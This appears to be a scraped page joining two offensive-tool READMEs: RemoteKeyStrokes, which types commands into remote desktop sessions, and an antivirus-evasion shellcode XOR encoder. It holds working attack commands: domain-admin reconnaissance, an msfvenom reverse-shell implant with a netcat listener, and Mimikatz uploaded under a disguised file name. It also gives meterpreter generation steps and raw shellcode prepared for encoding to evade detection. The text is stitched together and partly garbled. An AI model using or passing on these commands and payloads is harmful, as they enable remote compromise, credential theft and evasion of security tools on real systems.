Login
A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.
All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop.
FreshRSS $ ./rks.sh -h
Usage: ./rks.sh (RemoteKeyStrokes)
Options:
-c, --command <command | cmdfile> Specify a command or a file containing to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)
-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)
-w, --windowname <name> Specify t he window name for graphical remote
program (freerdp is set by default if not
specified)
-h, --help Display this help message
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain
$ ./rks.h -c recon_cmds.txt
$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1
$ ./rks.sh -c implant.ps1
$ nc -lvnp 4444
$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1
$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64
tightvnc.$ ./rks.sh -i implant.ps1 -w tightvnc
rdesktop.$ ./rks.sh -i implant.bat -w rdesktop
Add text colors for better user experience
Implement Base64 file transfer
Implement Bin2Hex file transfer
Implement a persistence function for both windows and linux.
Implement antiforensics function for both windows and linux.
Implement to read shellcode input and run C# implant and powershell runspace
Implement privesc function for both windows and linux
It's a AV/EDR Evasion tool created to bypass security tools for learning, until now the tool is FUD.
Generate your shellcode with msfvenom tool :
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py
Then copy the output into the encryptor XOR function :
data = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
key = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...
print('{ ', end='')
for i in data:
print(hex(i ^ key), en d=', ')
print("0x0 };") # Notice that it adds one byte "0x0" to the end.
And then you can handle your decryption function, It's not easy for script kiddies ^-^, you can read more about it in my articale :
This is the result when running :
https://antiscan.me/images/result/07OkIKKhpRsG.png
